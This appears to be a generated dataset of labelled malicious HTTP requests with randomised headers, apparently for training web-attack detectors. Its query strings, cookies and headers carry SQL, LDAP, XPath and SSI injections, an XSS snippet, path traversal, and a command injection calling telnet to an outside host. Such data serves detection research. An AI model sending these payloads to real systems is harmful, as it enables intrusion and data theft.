MIME-Version: 5.9
Pragma: ypueboh='niiO3i'
Proxy-Authorization: Digest qop=2nwtea
Authorization: Digest username="eyrklhRL"
Range: -91317,1-,143349-680394
Referer: /4yot.php4
TE: trailers,trailers
Trailer: Trailer
User-Agent: wUcJfhm0 http://www.nadaqHe.cz
UA-CPU: 68000
UA-Disp: 268,3394,32
UA-OS: Solaris
UA-Color: color32
Via: ohseb/1.4 8.250.225.67, 6.6 www.ihgsu.tiff:6217
Transfer-Encoding: iieob
Upgrade: li4Qh/6.8
X-Serial-Number: 1695906696796277181
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44642
Start - Id: 43506
class: OsCommanding
GET /oe8tnpeatmHaehmiulo9/lhANqONh6cgPr/skC/nzearlwekeDittwso/s2JBMW/4@bW83/nAlrgE/jEdsTdrenocat7/aN/0L1sbodylibA0aytJexec8/aewi.msf?t65tiEl=%5C%22++++%5C%3B++%5C%2Fusr%5C%2Fbin%5C%2Ftelnet++www.matotoit.com+6387%3B&dAhb=0&openfromvFlibIk=be%5D%3E&VWk0httpsvISscriptO=%24hIhf&rros=emtoeooruweno&hinf3ohya1s=56626334&rmarsnw79ia4=bDp0cn2LPM HTTP/1.1
Host: 45.98.164.84
Connection: close
Accept: */*;q=0.9
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: *
Cache-Control: nazllnD=eio1w
Client-ip: 108.184.195.217
Cookie: Pp8noHi7nayle5=9095;0Adot=opun4Meen;tDideuHgL=ttrsmxx43aodmt;5O1uaot=$
Cookie2: $Version="626"
Date: Sat, 29 Oct 05 07:23:02 UTC
ETag: "1ZIJyiA7qSu4@.@P-w"
Expect: qEtoe
From: entRerd@7ndhcnQeej.be
If-Modified-Since: Mon, 08 Dec 08 16:01:11 GMT
If-Unmodified-Since: Fri, 02 Dec 05 13:56:19 GMT
If-Match: *
If-None-Match: "5jIqrngsvo7.AafNA"
If-Range: Mon, 03 Jul 06 13:27:32 CET
Max-Forwards: 6291
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Basic bFJvZ25nOmVmVGNx
Authorization: Basic OW9iSTp6bGVlaXdhNQ==
Range: 32-61,4386-85
Referer: /s90e.sh
TE: trailers,trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/0.7 (compatible; MSIE 4.3; Linux i386; hNce; wyrh3yat; Drorog0a)
UA-CPU: MIPS
UA-Disp: 777,376,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 5281x2497
Via: 8.4 www.noliB.js, ttwi7a/3.3 www.mno6re.html
Transfer-Encoding: compress
Upgrade: ote/6.5, duri/2.2, tc0/0.3, IHe7/3.9
Warning: 900 www.eenCnh.jpeg "aDmktlcy9embade" 
X-Forwarded-For: 106.96.131.159
X-Serial-Number: 521013041943
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 43506
Start - Id: 42010
class: SqlInjection
GET /aUcmeeonih/gte9dcnhnls/ns4/zN/NPStviB@xp_YO3HC/oooric/eJMNn/C4HYTlocation/3lctn/arCttehuTblwoatari/BSl.php?6eqTEiTsos5uSo=6901&allACGLJxp_=-Iv5+0sAoeq13opo&rse3wadaXhiet4=dlslwifonphoi9&ssissffhtqgrei=fchildsystem%24t+&ojtuuonei=peixcltwhree&i3HHa2childoL=%3Eilm&emdphentdv=l4ZpZYCR2&ia29eeowotg8Iea=19&tYe8irddrniaper=%27+or+id++++in++++%28+++select+++++*++++from++++++user_db++++%29&qH=10&xbP7f=189399&TGLVhomezcq=Gehe%3F%3D HTTP/1.0
Host: www.ceti.ch:9366
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-chinesetrad;q=0.8
Accept-Encoding: 
Accept-Language: iiiae-O;q=0.3, o-nubllue, HpaOa-I;q=0.9, d-aytCaai, 1Mbh-o;q=0.2
Cache-Control: min-fresh=95924
Client-ip: 11.178.28.161
Cookie: seogumOoc=Enenn;vo0@3F66SMF=55;6sfhii4ns4wns=wsroyiEhd;euoOoAa7heihs=) a read q/nc3c6&t
Cookie2: $Version="53"
Date: Thu, 19 Aug 04 16:28:56 GMT
ETag: "6Uyl2Y07moKN10dFmON"
Expect: 100-continue
From: etDdz@s1Ttlneied.ch
If-Modified-Since: Wed, 04 Oct 06 22:40:15 UTC
If-Unmodified-Since: Sat, 12 Aug 06 09:45:45 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 13 Aug 09 09:08:32 GMT
Max-Forwards: 0
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Digest uri=/oyooyi/aelsuo1/iteo/eu7usa/EDiri.cfm
Authorization: Digest opaque="4venij"
Range: -2,-9858,-988607
Referer: http://lExlis9.fr/sheaaEjs.tiff
TE: trailers,trailers
Trailer: Trailer
User-Agent: tiLataa
UA-CPU: Sparc
UA-Disp: 442,012,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 0057x268
Via: 2.8 104.24.217.201
Transfer-Encoding: compress
Upgrade: efau/6.6
Warning: 117 www.dpoc.html "usfeuteterl01" 
X-Forwarded-For: 214.42.126.39
X-Serial-Number: 063116688396663
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 42010
Start - Id: 39394
class: SSI
GET /k1S6ZwHobject/nludEdtNs0es/slhte/qformlcR9d7/b8IkggU1/aphncrwdEocorndjei.aspx?Anfhsaateg=041&iThtoa=88&UEsZ0BVjlocationmochaL=5&se=s7&tee4thoefsrot=876&scriptopen9xZIrUGapc=1&kbtheI=icE0oznhogerotet&UiIboot.inietc2=o+xShumouo%40%40%3BC&5_OscriptDMf8sam=4348436548&ZZmJ=6823440&tluhr=ilsyaacotPne2cz&Lc1k3@mg1ZPX=805&tenaEfriEtojg7e=37240258&y0y6f1kpottie=82724&en1nriRn5loiden=%3C%21--%23echo+var%3D%22date_gmt%22--%3E HTTP/1.0
Host: 60.37.97.60
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: eele3-x, gKtt-nsEhtxm, m-ibs, 3nelbhHf-e, Uli-eqa9sns;q=0.8
Cache-Control: no-transform
Client-ip: 247.66.9.211
Cookie: asbcdRosmh2jioI=<n;GdnuroRyo=IaaEict;r53=Seo
Cookie2: $Version="28"
Date: Fri, 15 Apr 05 04:35:27 UTC
ETag: "4Brn_CPTrEZ4KqY"
Expect: 100-continue
From: gdiexzng@dnnsS.com
If-Modified-Since: Mon, 28 May 07 21:30:51 GMT
If-Unmodified-Since: Tue, 18 Sep 07 24:40:18 UTC
If-Match: "nZrSCJUJqXYUNKiigE"
If-None-Match: "fa6XV9CS8EvXvXVfe6c"
If-Range: Tue, 14 Feb 06 13:57:58 UTC
Max-Forwards: 0523
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: reenr ueer=altyt2
Authorization: Basic bHRzaWV0dGU6bWVpcnM5
Range: 32-500
Referer: http://grme.ch/T0iaewDm/tseNmwn/31ot/iT1ete.avi
TE: chunked;q=0.8,deflate,deflate;q=0.7
Trailer: Accept
User-Agent: Mozilla/4.3 (Machintosh; U; PPC 2.7; hc-tA; rv:0.5.4) Gecko/09131006
UA-CPU: x86
UA-Disp: 939,8855,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 696x8409
Via: 3.0 www.7ehr4n.jpeg, 7.1 www.xlcdLy.js:59, 8.6 233.141.81.121
Transfer-Encoding: moig
Upgrade: Trtet/1.3, sieet/3.4, eced/6.6, yns/9.1, snfH/3.3
Warning: 931 191.117.0.135:8 "o2emeai5i" "Wed, 18 Nov 09 03:55:48 GMT"
X-Forwarded-For: 98.145.13.52
X-Serial-Number: 3967259354
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39394
Start - Id: 41908
class: SqlInjection
GET /tQF41EDRwanQ./seG@@PHOL-Byr3CE7/t6/sT.Ial/aiSliytc.nsf?jOAiO=leHxrdecta+&lrsmaiosxpi=fq&uHBbRS6Z43=93&SbLa6zlfmosctes=nCv&ue=dhhat&5hn=eNNQARwyKQ7w&_xV2LLik=%27%3B+++begin++++declare+++%40ret++++varchar%288000%29++set++++%40ret%3D%27%3A%27+select+++%40ret%3D%40ret%2B%27+++%27%2BSl6nnhi%2B%27%2F%27%2Bpassword+++++from+fna+++where+892hin%3E%40ret+++++select+++%40ret+++++as++ret++into++++foo+++++end-- HTTP/1.1
Host: www.mpTsn.net:80
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *;q=0.0
Accept-Encoding: compress
Accept-Language: aoectted-oend2d;q=0.8, zia7n6iz-st;q=0.3
Cache-Control: max-stale=37
Client-ip: 199.227.44.84
Cookie: dna8=i;nacmPh9gn6tr=';AjvEvar=36335
Cookie2: $Version="2"
Date: Mon, 26 Sep 05 10:43:03 UTC
ETag: W/"TUQ5rHNqeRRBotohPkB"
Expect: doNNthyt=nejtsTs;rieoNrea
From: whodpi@rrheriuA.net
If-Modified-Since: Tue, 11 Aug 09 10:12:28 UTC
If-Unmodified-Since: Sat, 10 Nov 07 23:23:12 GMT
If-Match: "7k84Q-g8qC-HE-ARv"
If-None-Match: *
If-Range: *
Max-Forwards: 95
MIME-Version: 4.7
Pragma: eoantyc='asuum7'
Proxy-Authorization: NTLM ZXI5aW5vc2VsdHJadGxldmVnYXJlZWFvYXVrczYxaXhPaXRlOA==
Authorization: NTLM TnR0Y2I2bm5kbG9tc2FlbHMwb2l1b3FsZGUzZXJhb25hc3NtZGphdWRhSXNlaXRu
Range: 697748-55,41-938919
Referer: /t4ioyqle/ntmo/ehei/wseostso/lua3.mdb
TE: trailers,trailers,trailers
Trailer: Via
User-Agent: Mozilla/2.4 (Windows; U; Windows NT 3.9; eA-nA; rv:1.2.2) Gecko/49873649
UA-CPU: MIPS
UA-Disp: 421,960,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9010x724
Via: FTP/7.2 www.Rsnie.shtml
Transfer-Encoding: Edrt; rNt4este=kln1h
Upgrade: ejskmd/8.1, itcsut/3.9, ooo/5.9
Warning: 693 www.eetix.jpg "disicab5cesf" "Tue, 14 Aug 07 21:20:16 CET"
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 850343
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41908
Start - Id: 48189
class: XSS
PUT /nhq-h_.9M@B/e_EMjxSxDZ_yYva1n0P.pl? HTTP/1.1
Content-Length: 229
Content-Language: 1epa97,1fvdjm
Content-Encoding: deflate
Content-Location: /ognrbnd/actvr/d8t8ritN/sormmb/lafeo.nsf
Content-MD5: MXNocnlmZUVhcmxha29zbg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 19 Dec 06 13:20:21 CET
Last-Modified: Sun, 19 Nov 06 24:42:52 GMT
Host: 34.229.45.104
Connection: keep-alive
Accept: video/quicktime;q=0.7
Accept-Charset: windows-1255;q=0.5, euc-tw;q=0.6, x-mac-ce, x-mac-icelandic
Accept-Encoding: 
Accept-Language: <style     type   =" text/javascript" >[alert  ('lnwertj');]</style  >
Cache-Control: no-store
Client-ip: 116.127.131.89
Cookie: u0tikmi=t9to9be;e6aNzsaymiav=lGH;ilieostadteeu=98422;Nw4styordwn=904413;tr=b.mtY@Ts1KBP;ixerilyse=79eeOe5h2tcy 
Cookie2: $Version="97"
Date: Sat, 04 Mar 06 22:35:57 CET
ETag: W/"fHpeY1yAnsnzfzE3rW"
Expect: alo9v=ts9oerrr;si8nlg=taofacfO
From: hgaalsS@erkrnd3ae1.it
If-Modified-Since: Sun, 13 Feb 05 17:04:03 UTC
If-Unmodified-Since: Sun, 03 Jan 10 10:48:35 UTC
If-Match: *
If-None-Match: "0AUvDd@AUh6F29Qkm"
If-Range: Sat, 10 Jul 04 09:42:18 GMT
Max-Forwards: 2
MIME-Version: 0.6
Pragma: e='rq9eft'
Proxy-Authorization: Digest cnonce="sTcbsOs"
Authorization: NTLM cWVkMGFvaEFheURpYm1haWxpYzZBc2dsc2xHNXRwZG5rZW5nMGhhTGVxU2V0M2Vl
Range: 4-7,-93,820296-262758
Referer: http://www.attfion.com/n78l/jTsjI5/yibnpaJl/h5nm8AW.tiff
TE: chunked;q=0.4
Trailer: Range
User-Agent: Mozilla/6.9 (Machintosh; U; PPC Mac OS X 3.3; nA-fs; rv:2.6.9) Gecko/85940047
UA-CPU: Sparc
UA-Disp: 6418,097,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 615x877
Via: 5.4 www.eysN.js, FTP/2.2 37.54.197.137, FTP/1.9 www.scdoc9js.htm:3
Transfer-Encoding: compress
Upgrade: srri/9.4, f3wl9/8.3, Feenos/9.2
Warning: 842 www.nuuni.css "sstuatfendn" 
X-Forwarded-For: 168.34.69.100
X-Serial-Number: 1417997489185610927
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~

eSi4yoessaaac4T=|rct/&aeDioiIe=5533469389&ntbymstm8e=lserviceshat8rs0otetelnetnjny&rCe=617638627&jM3-v=wiMnretaa2O&metaS5a9g=cone&orrtntap=hht udivtpese%o&hL-gGPN0H=winnt1Sho&UitttHy5=931276&dbeyde421Eteduc=itde0lpa8r6xtcNa

End - Id: 48189
Start - Id: 48427
class: XPathInjection
GET /ckatvMmes1/5hsorruattHehctno/1VRN/sqdfG6eere/hhs3tyyei/US8lsdivvmailwYxtermIySobject/Sk0eetrihEcc9am2/e0QjrkqnqXVKhQ/nrr_EVUk./og9ES5zCT/QTfIpsepu.-.jpeg?winGtchmi3l05t=%270r&n9nsa9rsE=tmpe&rcp9Ui3gJsU=Gipa&dsntkftBlaa=e+olx%3Eeahen+maep+&h0mepsRhm1f=itinbna&aZ0yX=mdggdhOAo&Osoleeelid9rd1c=sn%7E&sint1owzed=o&egpAccSeesz=29921&DhvesNedw=60441&nnnunpitdE=5122605 HTTP/1.1
Host: 83.59.178.21:7377
Connection: close
Accept: application/*;q=0.4, image/gif;q=0.7, image/*;q=0.6
Accept-Charset: us-ascii, x-mac-greek;q=0.4, shift_jis, x-mac-icelandic, isiri-3342
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 169.67.177.34
Cookie: fscs6n3erc=10     or  eEl/r/3tfr/child::node()[position()=92]  or     7=
Cookie2: $Version="526"
Date: Thu, 29 Oct 09 16:16:17 GMT
ETag: W/"-v3s2h0I2QWf-G_iI"
Expect: 100-continue
If-Modified-Since: Mon, 19 Jun 06 08:50:10 GMT
If-Unmodified-Since: Sun, 26 Oct 08 09:06:03 CET
If-Match: "2_pe.e97aGREU4y7p."
If-None-Match: *
If-Range: *
Max-Forwards: 29
MIME-Version: 7.3
Pragma: atE=eaetn
Authorization: aiKbp0 2hefcinv=toIdrhes
Range: 873979-,91-759766,03-8913
Referer: http://etTNdyoe.fr/hTsnet/t0ret/eNHiK/hyphvd.ace
TE: trailers,trailers,trailers
Trailer: Accept
User-Agent: Mozilla/6.1 (Machintosh; U; PPC Mac OS X 2.8; cn-yi; rv:9.8.7) Gecko/79172991
UA-CPU: MIPS
UA-Disp: 681,4806,16
UA-Color: color32
UA-Pixels: 679x1552
Via: FTP/6.3 83.123.55.97, FTP/6.5 www.hib0en.htm:6
Transfer-Encoding: compress
X-Forwarded-For: 110.20.49.195
X-Serial-Number: 2509612458
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48427
Start - Id: 37517
class: LdapInjection
POST /wciscpoi3zah9SsoeetF/3SrwoDdwuDrtzUuveP6p/l9-Su9TJGv.Kf0Fox.js? HTTP/1.0
Content-Length: 48
Content-Language: t5n,ttpe,oeiREne
Content-Encoding: compress
Content-Location: http://4rMNi5.cz/eutsm/3ir7tT/rrdnld8t.jsp
Content-MD5: dGhhMmhuNG9lZHJybW5pYg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 21 Jul 04 08:47:31 CET
Last-Modified: Fri, 20 Apr 07 20:09:18 CET
Host: 224.28.165.212
Connection: keep-alive
Accept: video/quicktime, video/*;q=0.8, video/*;q=0.6
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 244.64.43.249
Cookie: FosvBlorn=itprocessing-instruction+loHnisla;ense5hIorcrcriF=eekDeihmlnie
Cookie2: $Version="571"
Date: Fri, 31 Mar 06 21:00:26 CET
ETag: "u34qWBiJNpxKq9A"
Expect: 100-continue
From: 3t4hae@dlnp4fwft.uk
If-Modified-Since: Wed, 27 Apr 05 12:30:48 CET
If-Unmodified-Since: Tue, 05 Dec 06 13:53:45 CET
If-Match: "dNyeVjFdsZkDQO.ri-I9"
If-None-Match: *
If-Range: *
Max-Forwards: 587
MIME-Version: 0.6
Pragma: rU='6tge'
Proxy-Authorization: NTLM NWkxZXN3eXNodGFpb25zTnJnbG5UZTdyaEVhd3Jhc3lyeWVJ
Authorization: NTLM b3MwdHV5eGVpdjJqVDdzZFVvcm95dGVtQW4xangwZ2IxaGhzbXJpdWhwZA==
Range: 0516-7855,069180-,334-
Referer: /tcdndp/sspoEo/8E3j.gif
TE: deflate,gzip,trailers
Trailer: Connection
User-Agent: Mozilla/1.9 (X11; U; Solaris 1.8; ck-tm; rv:7.6.3) Gecko/69902091
UA-CPU: 68000
UA-Color: color16
UA-Pixels: 2665x9772
Via: HTTP/9.6 221.168.145.233
Transfer-Encoding: gzip
Upgrade: c0e/0.5, ndgd/9.1
Warning: 123 www.sswne9.png "xiaoxtnnd9tipju" 
X-Serial-Number: 4606842395290054569
~~~~~: ~~~~~~~~~~~~

a5L2Su=mEr)(&(objectClass =    igr*)

End - Id: 37517
Start - Id: 38966
class: LdapInjection
GET /wx0VYEDbL0_6oU/wj.jpg?dseslqAateiute=E&tsmane=84174100&ae=%29+%28++++%7C%28cn%3D*o+++%27brien*%29%28mail++%3D*o%27brien*++%29+&rnsp=fxsNl_H-l&disbueirsi8p=2564&ErV_7=s3Qz&g3n2eeuh=dies HTTP/1.1
Host: 174.103.136.74
Connection: close
Accept: audio/*;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 65.168.89.85
Cookie: s6nowlds=se2;e9tsmSsc1=h8m7UaeKbI01;ellpzhoahobn9=aou
Cookie2: $Version="2"
Date: Mon, 05 Sep 05 14:28:24 GMT
ETag: "UHQB-TkfNTVLF8xK"
Expect: 100-continue
From: hisAka@u5t1a5.st
If-Modified-Since: Thu, 24 Apr 08 12:29:45 CET
If-Unmodified-Since: Thu, 31 Mar 05 18:15:08 UTC
If-Match: "l2lCjGHg3TNbA0MV"
If-None-Match: "1DJXBMT7kEwU@7tZ@vQ"
If-Range: "vDWG5BbUkt0NAYk"
Max-Forwards: 9226
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: Digest cnonce="nisso"
Authorization: oestn o6ftes=tfla
Range: -4,236-4976,748576-21
Referer: /AaI4/useetue.pl
TE: deflate;q=0.8,chunked
Trailer: Pragma
User-Agent: Mozilla/7.9 (X11; U; Linux i586 7.0; 1f-1i; rv:5.4.9) Gecko/38901168
UA-CPU: 68000
UA-Disp: 716,7145,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 0621x5666
Via: 3.2 www.6rlelaqr.htm:661
Transfer-Encoding: identity
Upgrade: hnegB/7.8, nnade/5.0, ony/9.4
Warning: 244 129.54.234.141 "tdkaRrieoeridtsfiy" 
X-Forwarded-For: 181.46.26.226
X-Serial-Number: 498357729
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38966
Start - Id: 38177
class: LdapInjection
GET /tp12PblmLGYSb/tYyUX-/rM0GLoL4/vbscriptAP/l9ec6z.swf?uoeErew2=hipg3h%3Eart5oro&A2between5W=230549&pUFWQshutdownW=t%403vvIeNg-iy&ai7aaLrtreng2=6Ey&5ouuhcpmnensoua=811&s9teeorsy=ih8u_k_&cfz4nko0TDU9=64478465&1nVXRZAiGiEr=s++tlueg&hg3qorlgooi=16806&dmle8uywnwltocs=ae9jt&s1fe=ue%29%28%26%28objectClass+++%3D+++na*%29&2ulmv8up=85112175&eruBrEevte=o%26essg9yto HTTP/1.0
Host: 230.128.242.179
Connection: keep-alive
Accept: */*
Accept-Charset: utf-7, euc-jp;q=0.9
Accept-Encoding: deflate;q=0.9, gzip;q=0.4
Accept-Language: fS-hpe;q=0.7, nIlkht-ffi2ba, ToCijn-olii
Cache-Control: min-fresh=212
Client-ip: 40.128.48.190
Cookie: Iuvbaewn=/ton62ecfonege];jp4.d=oev8X;gnhnlvmnRdonea=i?xterm
Cookie2: $Version="819"
Date: Fri, 10 Mar 06 18:17:00 UTC
ETag: W/"cvMbx4sfux4.USQJj"
Expect: Lsssd
From: 5n7e@llnrwde3K.st
If-Modified-Since: Sun, 12 Dec 04 08:40:40 GMT
If-Unmodified-Since: Fri, 14 Sep 07 18:03:39 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 28 Mar 05 14:38:31 GMT
Max-Forwards: 7671
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: NTLM ZWFjdGNpcHQ3ZGM5U2hjc2Vzc24xdEllRWN0c3VramVIdA==
Authorization: Basic dHNzMmRxZzpuZHJyZWw=
Range: -58269,-622
Referer: http://iyezCpt.cz/9oot/fktm/kii3i/WaJiC.gif
TE: trailers
Trailer: Via
User-Agent: Mozilla/0.2 (Windows; U; Win 9x 0.5; qt-Dr; rv:9.8.2) Gecko/20984432
UA-CPU: PowerPC
UA-Disp: 776,149,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 431x6925
Via: 3.2 www.aRput.tiff
Transfer-Encoding: identity
Upgrade: nume/0.6, Uma/7.3
Warning: 714 196.134.47.248 "mvqoncbecrdtrzc" "Wed, 27 Jul 05 23:32:10 GMT"
X-Forwarded-For: 80.167.139.18
X-Serial-Number: 276586158043
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 38177
Start - Id: 40785
class: SSI
GET /hfnoa0wastoI0rmru3qG/HKautoexec@tPAPnt49g/eidHtosmrR3l/ratrhCu/mc/e3thA.htm?jlyAO=48324329&rmly=brrml6tiywsrhtuye&s5=htuoin1noao&tNatateh3adl=1e&cE3E9d0=ktrj8aMhHe&bhewe=oFiXGrSS7U&I-c6rfC=2pea6rSvsqnng&sahUi=%3C%21--++%23odbc++++connect%3D%220f%2Cxt%2Cf4a%22++++statement%3D%22select++++*+++from+++9%22--%3E&0TtE6gmaabneie=Ehome%3E&RDlasa0iRi=z3atpdass HTTP/1.1
Host: www.zgdi3s0dz.net
Connection: close
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 79.174.208.245
Cookie: eouenh7iutda=0xsMte9lE3n
Cookie2: $Version="92"
Date: Tue, 04 May 04 12:38:38 GMT
ETag: W/"n6Vs6wO0z4ETSDqV3lL-"
Expect: 100-continue
If-Modified-Since: Thu, 20 Sep 07 20:26:35 CET
If-Unmodified-Since: Sun, 10 May 09 11:20:27 UTC
If-Match: "moMB-k@2UbJhrHlz"
If-None-Match: *
If-Range: Fri, 21 Oct 05 21:45:11 UTC
Max-Forwards: 614
Pragma: heseaoy0='ilrtlAe'
Proxy-Authorization: Basic bmVoc2o6bDlxb2FsdA==
Authorization: Digest algorithm=MD5
Range: 317784-4,80-130,625-44564
Referer: /81idt/hseGet/dbgtiec/Eie5dCd/ukica.mspx
TE: trailers,gzip
Trailer: Trailer
User-Agent: Mozilla/8.9 (compatible; Konqueror/7.8; Win98; uHaRaos; ts9tyiiti)
UA-Pixels: 4833x5333
Via: FTP/9.1 www.Ilrsrsti.tiff, amn/6.1 www.neenrna6.htm
Transfer-Encoding: hro7iu
Upgrade: vgs/0.3
X-Serial-Number: 095022921
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40785
Start - Id: 45528
class: PathTransversal
GET /pl/Vh4LKxj2lUmxOv/ery1ntqthluLtuh1vtiw/b2zQI/cM/itrsyes8slifsvhniSi/BZYRHeeL/r5zsx3-/eusCoeaetlegAe0nf7/8Cinput62phpkvePnjy.php?IdIiaacwo5wft=%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Fllma%2Fasesanta%2Fnsnsde%2Fvean.cgi&CYY6=tIdlr+hfhen%3F+d%2Bbuxml&oeewiedeh=xs%3Ay6t+at%2Bazn5sk&Siaxavx16es=natG%3Bdu%3F%3Esrunionhn%24varetcpassthru%5D HTTP/1.1
Host: 183.18.165.129
Connection: close
Accept: audio/*, application/x-tar;q=0.2
Accept-Charset: *;q=0.0
Accept-Encoding: gzip;q=0.4
Accept-Language: *
Cache-Control: no-cache
Client-ip: 228.114.110.173
Cookie: aeutest=omVT2;zsll=ilfBe;as8GaOulntashe=IB uc
Cookie2: $Version="99"
Date: Thu, 14 Aug 08 05:20:57 GMT
ETag: W/"wFLK5UzYD3@eO._7"
Expect: 100-continue
From: aFhd@iesknmut3c.net
If-Modified-Since: Mon, 12 Sep 05 23:21:41 UTC
If-Unmodified-Since: Fri, 10 Oct 08 03:40:36 CET
If-Match: "QO7mUYF7KF7JrlwdRBK"
If-None-Match: "SIct@J.Hxi28Rh7C"
If-Range: "o-RPy4fdvX7UrgA3X"
Max-Forwards: 4111
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic cnV0YWxqZU46N3RtZW4=
Range: 903-3,3-4324,-8
Referer: /iofj8ong/diatmte.pl
TE: trailers,trailers,trailers
Trailer: Accept
User-Agent: Mozilla/6.7 (Machintosh; U; PPC 6.5; kn-if; rv:6.8.7) Gecko/00068181
UA-CPU: 68000
UA-Disp: 3482,2872,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 441x867
Via: HTTP/3.1 139.69.148.31
Transfer-Encoding: compress
Upgrade: vleih/1.8, zzq/8.8, etwstn/4.5, eseo/9.8, ilezr/6.6
Warning: 291 197.115.20.32 "ofotvtereustbtDpofo" 
X-Forwarded-For: 55.26.191.205
X-Serial-Number: 2215888867609
----: ------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 45528
Start - Id: 42968
class: OsCommanding
GET /tgXXXO/3VE5V/pmDJ3qtVidFlL63q.Pua/axfrcm1dun/kgN/36foeeeERtjrth/mD98jH365yAwdfEgwR6O/suee/oZqOLQrK6-n3SX.exe?oywg0nahhAn9c=t+&ni6cnqi=74&oxe24tea=g HTTP/1.0
Host: www.NRrtohse9.st:60797
Connection: keep-alive
Accept: */*
Accept-Charset: macintosh, x-mac-cyrillic
Accept-Encoding: *
Accept-Language: dxob-hofu0a;q=0.5, d6ws-i9
Cache-Control: no-cache
Client-ip: 115.213.51.204
Cookie: 3IRtsies1ta=%2Fbin%2Fps%2500++%7C;9binoKZhwwgetr.2=ttjrfntAe;qzDc%u_gXBDB=8;oNqisidz=eoea
Cookie2: $Version="31"
Date: Wed, 24 Feb 10 12:41:51 UTC
ETag: "BY_3eSTW3yc4dwD-"
Expect: 100-continue
From: ttee@eneo9voh.gov
If-Modified-Since: Thu, 27 Oct 05 19:09:26 UTC
If-Unmodified-Since: Thu, 27 Apr 06 14:33:12 GMT
If-Match: "1IHT1N9bRUeKEUH-_"
If-None-Match: *
If-Range: Thu, 13 Nov 08 16:05:00 UTC
Max-Forwards: 8398
MIME-Version: 5.1
Pragma: aotg8Ti=R
Proxy-Authorization: Basic aWl3dDp5aWNidHQ=
Authorization: NTLM VXJvZE5hbmJzbHNhQTRzbnBlb3JhdG1yZXJ2d2VyZTloaGlhZWxDeWg=
Range: 015-2505
Referer: http://www.uUOene.com/eiyEoni/lan2u.bin
TE: trailers,chunked,chunked
Trailer: Upgrade
User-Agent: hihO/3.4
UA-CPU: StrongARM
UA-Disp: 1962,830,16
UA-OS: WinNT
UA-Color: color16
Via: 9.0 241.141.146.155, FTP/4.7 153.214.90.102
Transfer-Encoding: deflate
Upgrade: 6tes/6.0, eset/0.0
Warning: 430 www.ooy4teh.gif "nn6ltSh" "Wed, 15 Nov 06 17:03:14 GMT"
X-Forwarded-For: 119.221.173.244
X-Serial-Number: 943179612678
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 42968
Start - Id: 48660
class: XPathInjection
POST /laar8ZxlF6l/rUVq-I/fo/lacl7s3rTuDsssO7/FVn/nsfllrin03bentHqytyn/3cNre/kxQHNlI.RUAu9nokreZ.swf? HTTP/1.1
Content-Length: 472
Content-Language: 4tontw
Content-Encoding: identity
Content-Location: http://sEiiNBTx.cz/zn2h1a/NWynatev/dfeeeUn.msf
Content-MD5: bm1vcnNEY0ZzY3dpcWN5Tg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 24 Dec 04 22:52:15 CET
Last-Modified: Sun, 01 Jun 08 20:03:58 CET
Host: www.tmnnfsoee.ch:2310
Connection: close
Accept: */*;q=0.5
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: uar4gHMm-iHxo, up0ss-f1;q=0.3, paeem-c;q=0.6, Bdc-ns
Cache-Control: no-cache
Client-ip: 125.212.241.80
Cookie: somrliQnh=location;SctedSe2ep=itbmr
Cookie2: $Version="57"
Date: Wed, 14 Jan 09 15:14:43 GMT
ETag: "VLqyCk.CKfLHgYarbRgi"
Expect: 100-continue
From: eta3@rewxn.biz
If-Modified-Since: Mon, 04 Oct 04 20:56:05 UTC
If-Unmodified-Since: Fri, 13 Nov 09 12:43:24 GMT
If-Match: "6mmMMgBTJ-fziOhaiZYm"
If-None-Match: *
